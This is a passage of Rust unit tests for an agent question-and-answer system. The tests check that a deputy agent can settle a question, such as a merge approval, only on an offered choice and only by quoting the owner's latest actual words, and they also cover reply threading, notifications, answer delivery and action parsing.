2857 .unwrap();
2858 q.say(" Merge it please ").unwrap();
2859 assert!(
2860 q.settle_by_deputy("deputy-x", "merge", " ").is_err(),
2861 "an empty quote is refused"
2862 );
2863 assert!(
2864 q.settle_by_deputy("deputy-x", "merge", "ship it").is_err(),
2865 "a quote the owner never said is refused"
2866 );
2867 assert_eq!(q.status, QuestionStatus::Open);
2868 q.settle_by_deputy("deputy-x", "merge", "Merge it please")
2869 .unwrap();
2870 assert_eq!(q.resolution().as_deref(), Some("merge"));
2871 }
2872
2873 #[test]
2874 fn a_local_release_approval_is_held_to_the_merge_rules_but_an_escalation_is_not() {
2875 let mk = |choices: Vec<String>| {
2876 let mut q = Question::new(
2877 String::new(),
2878 crate::bump::NOTICE_NODE.into(),
2879 "release-watch".into(),
2880 "Release?".into(),
2881 String::new(),
2882 choices,
2883 );
2884 let mut dep = Deputy::new("brief".into());
2885 dep.seat = Some(crate::agent::SeatState::new("deputy-x", "alpha", 1));
2886 q.deputy = Some(dep);
2887 q
2888 };
2889 let mut approval = mk(vec!["merge".into(), "hold".into()]);
2890 assert!(crate::deputy::merge_gated(&approval));
2891 approval.say("マージしていいよ").unwrap();
2892 assert!(
2893 approval
2894 .settle_by_deputy("deputy-x", "merge", "ぜひマージして")
2895 .is_err(),
2896 "a quote the owner never said is refused"
2897 );
2898 approval
2899 .settle_by_deputy("deputy-x", "merge", "マージしていいよ")
2900 .unwrap();
2901
2902 let mut esc = mk(vec!["rerun again".into(), "hold".into(), "leave it".into()]);
2903 assert!(!crate::deputy::merge_gated(&esc));
2904 esc.say("もう監視はいらない").unwrap();
2905 esc.settle_by_deputy("deputy-x", "leave it", "監視はいらない")
2906 .unwrap();
2907 assert_eq!(esc.resolution().as_deref(), Some("leave it"));
2908 }
2909
2910 #[test]
2911 fn a_merge_among_other_requests_settles_but_hold_needs_the_whole_message() {
2912 let mut q = approval_question();
2913 q.say("マージしていいよ。残りのレビュー指摘はフォローアップタスクとして積んで")
2914 .unwrap();
2915 assert!(
2916 q.settle_by_deputy("deputy-x", "merge", "どこかの言葉")
2917 .is_err(),
2918 "the quote must be the owner's"
2919 );
2920 assert!(
2921 q.settle_by_deputy("deputy-x", "hold", "マージしていいよ")
2922 .is_err(),
2923 "`hold` still needs the whole message"
2924 );
2925 q.settle_by_deputy("deputy-x", "merge", "マージしていいよ")
2926 .unwrap();
2927 assert_eq!(q.resolution().as_deref(), Some("merge"));
2928 }
2929
2930 #[test]
2931 fn a_quote_from_an_earlier_owner_message_does_not_settle_a_merge() {
2932 let mut q = approval_question();
2933 q.say("merge").unwrap();
2934 q.reply("sure?", vec!["merge".into(), "hold".into()])
2935 .unwrap();
2936 q.say("wait, hold off").unwrap();
2937 assert!(q.settle_by_deputy("deputy-x", "merge", "merge").is_err());
2938 assert_eq!(q.status, QuestionStatus::Open);
2939 }
2940
2941 #[test]
2942 fn a_deputy_settles_only_on_an_offered_choice_and_the_owners_own_words() {
2943 let mut q = Question::new(
2944 "task".to_owned(),
2945 "conduct".to_owned(),
2946 "conduct".to_owned(),
2947 "Done?".to_owned(),
2948 String::new(),
2949 vec!["yes".to_owned(), "no".to_owned()],
2950 );
2951 let mut seat = crate::agent::SeatState::new("deputy-x", "alpha", 1);
2952 seat.turns = 1;
2953 let mut dep = Deputy::new("brief".to_owned());
2954 dep.seat = Some(seat);
2955 q.deputy = Some(dep);
2956 q.say("setup done, go ahead").unwrap();
2957
2958 assert!(
2959 q.settle_by_deputy("someone-else", "yes", "setup done")
2960 .is_err()
2961 );
2962 assert!(
2963 q.settle_by_deputy("deputy-x", "maybe", "setup done")
2964 .is_err()
2965 );
2966 assert!(
2967 q.settle_by_deputy("deputy-x", "yes", "never said this")
2968 .is_err()
2969 );
2970 assert!(q.settle_by_deputy("deputy-x", "yes", " ").is_err());
2971 assert_eq!(q.status, QuestionStatus::Open);
2972
2973 q.settle_by_deputy("deputy-x", "yes", "setup done").unwrap();
2974 assert_eq!(q.status, QuestionStatus::Answered);
2975 assert_eq!(q.resolution().as_deref(), Some("yes"));
2976 let last = q.thread.last().unwrap();
2977 assert_eq!(last.who, Who::Agent);
2978 assert!(
2979 last.body.contains("setup done"),
2980 "the quote stays on the record"
2981 );
2982 }
2983
2984 #[test]
2985 fn a_question_written_before_deputies_still_reads() {
2986 let mut q = Question::new(
2987 "task".to_owned(),
2988 "conduct".to_owned(),
2989 "conduct".to_owned(),
2990 "Done?".to_owned(),
2991 String::new(),
2992 Vec::new(),
2993 );
2994 q.schema = 4;
2995 let mut v = serde_json::to_value(&q).unwrap();
2996 v.as_object_mut().unwrap().remove("deputy");
2997 let back: Question = serde_json::from_value(v).unwrap();
2998 assert!(back.deputy.is_none());
2999 }
3000
3001 #[test]
3002 fn saying_something_appends_an_operator_turn_without_deciding_anything() {
3003 let mut q = choice_question();
3004 q.say("does the cache need eviction?").unwrap();
3005 assert_eq!(q.thread.len(), 1);
3006 assert_eq!(q.thread[0].who, Who::Operator);
3007 assert_eq!(q.thread[0].body, "does the cache need eviction?");
3008 assert_eq!(q.status, QuestionStatus::Open);
3011 assert!(q.answer.is_none());
3012 assert!(q.waiting_on_agent(), "the ball is now in the agent's court");
3013 }
3014
3015 #[test]
3016 fn saying_and_replying_are_refused_on_a_settled_question_and_on_empty_text() {
3017 let mut answered = choice_question();
3018 answered
3019 .answer(Answer::Choice("SQLite".to_owned()))
3020 .unwrap();
3021 let a = answered.say("still there?").unwrap_err().to_string();
3022 assert!(a.contains("already answered"), "{a}");
3023 let b = answered
3024 .reply("still there?", vec![])
3025 .unwrap_err()
3026 .to_string();
3027 assert!(b.contains("already answered"), "{b}");
3028
3029 let mut abandoned = choice_question();
3030 abandoned.abandon("timed out");
3031 let c = abandoned.say("hello?").unwrap_err().to_string();
3032 assert!(c.contains("abandoned"), "{c}");
3033
3034 let mut open = choice_question();
3035 let d = open.say(" ").unwrap_err().to_string();
3036 assert!(d.contains("empty"), "{d}");
3037 let e = open.reply(" \n", vec![]).unwrap_err().to_string();
3038 assert!(e.contains("empty"), "{e}");
3039 assert!(open.thread.is_empty(), "a refused turn leaves no trace");
3040 }
3041
3042 #[test]
3043 fn a_reply_replaces_the_choices_and_moves_the_ball_back_to_the_owner() {
3044 let mut q = choice_question();
3045 q.say("SQLite or Redis, but what about disk space?")
3046 .unwrap();
3047 assert!(q.waiting_on_agent());
3048
3049 q.reply(
3050 "SQLite: it is one file, no server to run.",
3051 vec!["SQLite".to_owned()],
3052 )
3053 .unwrap();
3054
3055 assert_eq!(q.choices, ["SQLite"]);
3056 assert!(
3057 !q.waiting_on_agent(),
3058 "the agent spoke, so the owner is the one being waited on now"
3059 );
3060 assert_eq!(q.thread.len(), 2);
3061 assert_eq!(q.thread[1].who, Who::Agent);
3062
3063 assert!(q.answer(Answer::Choice("Redis".to_owned())).is_err());
3065 q.answer(Answer::Choice("SQLite".to_owned())).unwrap();
3066 assert_eq!(q.resolution().as_deref(), Some("SQLite"));
3067 }
3068
3069 #[test]
3070 fn notification_fires_for_the_first_ask_and_only_after_the_quiet_window_on_a_reply() {
3071 let mut fresh = choice_question();
3072 assert!(
3073 fresh.should_notify(Timestamp::now()),
3074 "nobody has been notified yet, so the first ask always pages"
3075 );
3076
3077 fresh.say("why not Postgres?").unwrap();
3078 let just_said = fresh.thread[0].at;
3079 assert!(
3080 !fresh.should_notify(just_said + jiff::SignedDuration::from_secs(60)),
3081 "still on the screen a minute later; no need to page again"
3082 );
3083 assert!(
3084 !fresh.should_notify(just_said + jiff::SignedDuration::from_secs(300)),
3085 "exactly the window: `>` means this side stays quiet"
3086 );
3087 assert!(
3088 fresh.should_notify(just_said + jiff::SignedDuration::from_secs(301)),
3089 "past the window: they may have walked away"
3090 );
3091 }
3092
3093 #[test]
3094 fn a_round_trip_of_turns_still_counts_as_one_open_question() {
3095 let (_dir, s) = store();
3096 let mut q = choice_question();
3097 s.put(&mut q).unwrap();
3098 q.say("why not Postgres?").unwrap();
3099 s.put(&mut q).unwrap();
3100 q.reply("no server to run", vec!["SQLite".to_owned()])
3101 .unwrap();
3102 s.put(&mut q).unwrap();
3103
3104 assert_eq!(
3105 s.count_open(),
3106 1,
3107 "one question that talked twice is still one open question"
3108 );
3109 assert_eq!(s.open_for(&q.run).len(), 1);
3110 }
3111
3112 #[tokio::test]
3113 async fn the_wait_returns_to_the_caller_when_the_owner_talks_back_without_deciding() {
3114 let (dir, s) = store();
3115 let mut q = choice_question();
3116 let id = q.id.clone();
3117 let writer = Questions::at(dir.path().join("questions"));
3118 let handle = tokio::spawn(async move {
3119 tokio::time::sleep(Duration::from_millis(30)).await;
3120 let mut fresh = writer.get(&id).expect("the question was filed first");
3121 fresh.say("why not Postgres?").unwrap();
3122 writer.put(&mut fresh).unwrap();
3123 });
3124
3125 let got = wait_for_owner(
3126 &mut q,
3127 &s,
3128 &quiet(),
3129 Duration::from_secs(5),
3130 Duration::from_millis(10),
3131 )
3132 .await
3133 .unwrap();
3134
3135 handle.await.unwrap();
3136 assert_eq!(got, Wait::Replied("why not Postgres?".to_owned()));
3137 assert_eq!(
3138 q.status,
3139 QuestionStatus::Open,
3140 "talking back is not a decision; the question stays open"
3141 );
3142 assert!(q.answer.is_none());
3143 }
3144
3145 #[test]
3146 fn a_say_that_lands_before_the_agents_reply_stays_unread() {
3147 let mut q = choice_question();
3148 q.say("A").unwrap();
3149 q.delivered_turns = q.thread.len();
3150 q.say("B").unwrap();
3151 q.reply("about A", vec![]).unwrap();
3152 assert_eq!(q.unread_from_owner().as_deref(), Some("B"));
3153 q.delivered_turns = q.thread.len();
3154 assert_eq!(q.unread_from_owner(), None);
3155 }
3156
3157 #[test]
3158 fn a_say_before_the_answer_is_handed_over_ahead_of_it() {
3159 let (_d, s) = store();
3160 let mut q = choice_question();
3161 s.put(&mut q).unwrap();
3162 q.say("first").unwrap();
3163 q.say("second").unwrap();
3164 q.answer(Answer::Choice("SQLite".to_owned())).unwrap();
3165 s.put(&mut q).unwrap();
3166 assert_eq!(q.unread_from_owner(), None, "closed: the guard stays");
3167 let mut out = Vec::new();
3168 deliver_answer(&s, &mut q, "SQLite", &mut out).unwrap();
3169 let shown = String::from_utf8(out).unwrap();
3170 let (a, b, c) = (
3171 shown.find("first").unwrap(),
3172 shown.find("second").unwrap(),
3173 shown.find("SQLite").unwrap(),
3174 );
3175 assert!(a < b && b < c, "{shown}");
3176 assert_eq!(q.delivered_turns, q.thread.len());
3177 assert!(q.answer_delivered);
3178 }
3179
3180 #[test]
3181 fn an_answer_alone_is_unchanged_and_delivered_says_are_not_repeated() {
3182 let mut q = choice_question();
3183 q.answer(Answer::Choice("SQLite".to_owned())).unwrap();
3184 assert_eq!(answer_for_agent(&q, "SQLite"), "SQLite");
3185 let mut q = choice_question();
3186 q.say("old").unwrap();
3187 q.delivered_turns = q.thread.len();
3188 q.say("new").unwrap();
3189 q.answer(Answer::Choice("SQLite".to_owned())).unwrap();
3190 let shown = answer_for_agent(&q, "SQLite");
3191 assert!(shown.contains("new") && !shown.contains("old"), "{shown}");
3192 }
3193
3194 #[test]
3195 fn action_specs_parse_strictly_and_must_name_an_offered_choice() {
3196 let choices = vec!["resume で続行する".to_owned(), "wait".to_owned()];
3197 let ok = parse_actions(
3198 &[
3199 "resume で続行する=resume".to_owned(),
3200 "wait=done".to_owned(),
3201 ],
3202 &choices,
3203 "run-1",
3204 )
3205 .unwrap();
3206 assert_eq!(
3207 ok["resume で続行する"],
3208 ChoiceAction::Resume {
3209 run: "run-1".into()
3210 }
3211 );
3212 assert_eq!(ok["wait"], ChoiceAction::Done);
3213
3214 let named = ChoiceAction::parse("x=resume:abcd", "").unwrap();
3215 assert_eq!(named.1, ChoiceAction::Resume { run: "abcd".into() });
3216 assert_eq!(
3217 ChoiceAction::parse("x=requeue", "").unwrap().1,
3218 ChoiceAction::Requeue
3219 );
3220
3221 for bad in [
3222 "no-equals",
3223 "=done",
3224 "x=resume",
3225 "x=resume:",
3226 "x=explode",
3227 "x=done:1",
3228 ] {
3229 assert!(ChoiceAction::parse(bad, "").is_err(), "{bad}");
3230 }
3231 assert!(parse_actions(&["ghost=done".to_owned()], &choices, "").is_err());
3232 assert!(
3233 parse_actions(
3234 &["wait=done".to_owned(), "wait=requeue".to_owned()],
3235 &choices,
3236 ""
3237 )
3238 .is_err()
3239 );
3240 }
3241
3242 #[test]
3243 fn only_a_chosen_label_with_an_action_is_actionable() {
3244 let mut q = choice_question();
3245 q.choices = vec!["resume".to_owned(), "SQLite".to_owned()];
3246 q.actions.insert("SQLite".to_owned(), ChoiceAction::Requeue);
3247 assert!(q.chosen_action().is_none(), "unanswered");
3248 q.answer(Answer::Choice("resume".to_owned())).unwrap();
3249 assert!(
3250 q.chosen_action().is_none(),
3251 "a label that merely reads like an action does nothing"
3252 );
3253
3254 let mut q2 = choice_question();
3255 q2.choices = vec!["SQLite".to_owned()];
3256 q2.actions
3257 .insert("SQLite".to_owned(), ChoiceAction::Requeue);
3258 q2.answer(Answer::Choice("SQLite".to_owned())).unwrap();
3259 assert_eq!(q2.chosen_action(), Some(&ChoiceAction::Requeue));
3260 }
3261
3262 #[test]
3263 fn a_reply_drops_actions_whose_choice_is_gone_and_old_files_read_without_actions() {
3264 let mut q = choice_question();
3265 q.choices = vec!["A".to_owned(), "B".to_owned()];
3266 q.actions.insert("A".to_owned(), ChoiceAction::Done);
3267 q.actions.insert("B".to_owned(), ChoiceAction::Requeue);
3268 q.reply("narrowing", vec!["B".to_owned()]).unwrap();
3269 assert_eq!(q.actions.len(), 1);
3270 assert!(q.actions.contains_key("B"));
3271
3272 let mut v = serde_json::to_value(&q).unwrap();
3273 v.as_object_mut().unwrap().remove("actions");
3274 let old: Question = serde_json::from_value(v).unwrap();
3275 assert!(old.actions.is_empty());
3276 }
3277}